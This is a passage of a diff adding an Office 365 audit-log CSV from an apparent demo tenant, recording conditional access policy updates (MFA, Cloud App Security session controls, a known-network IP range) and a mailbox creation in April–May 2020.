+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 2:49:03 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T03:40:23Z,,,New-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OrgPartition"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OrgPartitionDescription"",
+    ""Value"": ""Tenant Wide WKW Data Org Partition""
+  },
+  {
+    ""Name"": ""OrgPartitionOwner"",
+    ""Value"": ""66a88757-258c-4c72-893c-3e8bed4d6899""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": ""CY1PR06A007DC04.NAMPR06A007.PROD.OUTLOOK.COM""
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c""
+  }
+]"
+2020-04-16T06:06:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-16T06:06:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T06:06:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/16/2020 6:06:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:26 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-19T05:13:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:08 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
